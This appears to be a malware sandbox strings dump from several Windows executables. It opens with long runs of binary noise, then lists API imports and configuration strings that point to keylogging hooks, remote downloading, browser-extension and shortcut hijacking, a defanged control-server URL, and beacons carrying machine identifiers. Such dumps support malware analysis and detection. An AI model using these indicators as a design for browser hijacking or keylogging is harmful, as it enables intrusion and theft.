VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K
4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4
[email protected]@[email protected]?/[email protected]>.M>.YJ:
~J=/J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/[email protected]@[email protected]@[email protected]@[email 
protected]/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0
zui_E8*E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; 
K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M=-M=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.
=5(;4$=5(=4'<4':4)=4&
;2(:1':1'<2(:1';2(:0&<2(:1'
KWindows
eEWB.IEConst
0IdHTTPHeaderInfo
IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTPOptions
RegEnumKeyExA
GetWindowsDirectoryA
RegCloseKey
MsgWaitForMultipleObjects
RegCreateKeyExA
RegDeleteKeyA
ActivateKeyboardLayout
user32.dll
gdi32.dll
wininet.dll
GetKeyNameTextA
LoadKeyboardLayoutA
RegQueryInfoKeyA
InternetOpenUrlA
&{.WE{w3?.zg8%D];SJ
SetWindowsHookExA
iphlpapi.dll
GetKeyboardLayoutList
GetCPInfo
MapVirtualKeyA
EnumWindows
RegFlushKey
ShellExecuteA
GetKeyboardState
GetKeyboardLayout
EnumThreadWindows
version.dll
SetViewportOrgEx
GetKeyState
CreateIoCompletionPort
RegOpenKeyExA
SHFileOperationA
?qwshell32.dll
advapi32.dll
UnhookWindowsHookEx
DeleteUrlCacheEntry
GetKeyboardType
errorUrl
1.0.0.15
1.0.0.0820
JPEG error #%d
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help keyword specified.
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
fm4svr.exe_1392_rwx_0058F000_00001000:
iphlpapi.dll
comctl32.dll
GetKeyboardLayoutList
fm4svr.exe_1392_rwx_00592000_00002000:
URLMON.DLL
EnumWindows
RegFlushKey
ShellExecuteA
GetKeyboardState
GetKeyboardLayout
EnumThreadWindows
version.dll
a-zm-157391-v5.exe_2236:
.text
`.rdata
@.data
.rsrc
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
SHELL32.dll
ole32.dll
GdiplusShutdown
gdiplus.dll
WS2_32.dll
MSVCP60.dll
COMCTL32.dll
MSVCRT.dll
_acmdln
InternetOpenUrlW
WININET.dll
SHLWAPI.dll
PSAPI.DLL
iphlpapi.dll
reportname
appurl
User-Agent: Mozilla/4.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
xxxxxx
\kpfldahabkinpppnmpmcbfjbbphcafgm\1.0.0_0\js\index.js
dh.html
a%s\%s
%s\%s inst
%s\install_%d.tmp
Mozilla Firefox.lnk
Google Chrome.lnk
%sext.7z
Software\Microsoft\Windows\CurrentVersion\Uninstall\
{871C5380-42A0-1069-A2EA-08002B30309D}Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
SoftWare\Microsoft\Windows\CurrentVersion\Uninstall\
\config.ini
6.link
IEXPLORE.EXE
FIREFOX.EXE
OPERA.EXE
THEWORLD.EXE
//./%s
%s\%s.lnk
%s\jx\ExtractFiles
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
data=pid=%s
sn=%s
mac=%s
sign=%s
pid=%s&sn=%s&mac=%s&sk=%s
M-%.2d-%.2d
%ProgramFiles%\Internet Explorer\iexplore.exe
\Internet Explorer.lnk
xxxxxxxxxxxxxxxx
\360Chrome\Chrome\User Data\Default
\Google\Chrome\User Data\Default
%s\Preferences
%s\Extensions
%Program Files%\jstm
%Program Files%\fjwyusp\a-zm-157391-v5.exe
1.1.0.3
juese.exe
unist.exe
FHSev.exe_2328:
.idata
.rdata
P.FMS0
`.rsrc
P.FMS1
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
DragKindH%C
OnKeyDown
OnKeyPress
OnKeyUp
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")ControlsL%C
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutex
advapi32.dll
%s, ClassID: %s
ole32.dll
PSAPI.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[(*&[^%$#]@!)]
SysConfig.ini
~nB%uN
<requestedExecutionLevel level="requireAdministrator"/>
KWindows
UrlMon
UnhookWindowsHookEx
ReportEventA
GetKeyboardLayout
iphlpapi.dll
EnumWindows
GetKeyState
ActivateKeyboardLayout
GetWindowsDirectoryA
URLMON.DLL
GetKeyNameTextA
EnumThreadWindows
URLDownloadToFileA
RegCloseKey
SetViewportOrgEx
SetWindowsHookExA
!%.IZVrt
wininet.dll
MapVirtualKeyA
gdi32.dll
GetKeyboardLayoutList
'.Qapr
GetKeyboardState
%##,<`[~
user32.dll
InternetOpenUrlA
RegOpenKeyExA
GetKeyboardType
version.dll
LoadKeyboardLayoutA
)%.CI
GetCPInfo
( (=8{[;MsgWaitForMultipleObjects
SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE TargetInstance ISA
1.0.0.0
1.0.0.0818 - 2
NUnable to retrieve a pointer to a running object registered with OLE for %s/%s
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
shutdown(Service failed in custom message(%d): %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
FHSev.exe_2328_rwx_004BA000_00001000:
32.dll
InternetOpenUrlA
RegOpenKeyExA
GetKeyboardType
version.dll
LoadKeyboardLayoutA
juese.exe_2488:
.text
`.rdata
@.data
.rsrc
@.reloc
User-Agent: Mozilla/4.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
xxxxxx
reportname
appurl
CCmdTarget
CNotSupportedException
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
E:\TM-Clients\WuZun\Code\20140607sctx_Src\Release\juese.pdb
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
GetAsyncKeyState
CreateDialogIndirectParamW
UnhookWindowsHookEx
SetWindowsHookExW
MapVirtualKeyW
GetKeyNameTextW
GetKeyboardLayout
GetKeyboardState
MapVirtualKeyExW
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegDeleteKeyW
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
WS2_32.dll
InternetOpenUrlW
WININET.dll
IPHLPAPI.DLL
OLEACC.dll
IMM32.dll
WINMM.dll
.?AVCCmdTarget@@
.PAVCException@@
.?AVCWebUIController@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCMemoryException@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCFileException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
%s\%s
{871C5380-42A0-1069-A2EA-08002B30309D}Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
@SoftWare\Microsoft\Windows\CurrentVersion\Uninstall\
\jstm\config.ini
//./%s
%s\%s.lnk
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
juese.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
\Internet Explorer.lnk
xxxxxxxxxxxxxxxx
Internet Explorer.lnk
data=pid=%s
sn=%s
mac=%s
sign=%s
pid=%s&sn=%s&mac=%s&sk=%s
M-%.2d-%.2d
@%s (%s:%d)
%s (%s:%d)
%Program Files%\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
Mozilla Firefox.lnk
Google Chrome.lnk
tonnn.com/client/jstm/
hXXp://VVV.
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
Acomctl32.dll
Acomdlg32.dll
Ashell32.dll
Bf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Bf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
mfcm100u.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
Advapi32.dll
kernel32.dll
Cf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
SHELL32.DLL
lXXxXXXXXXXX
dwmapi.dll
UxTheme.dll
eShell32.dll
%s:%x:%x:%x:%x
MFCLink_UrlPrefix
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
COMCTL32.DLL
USER32.DLL
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
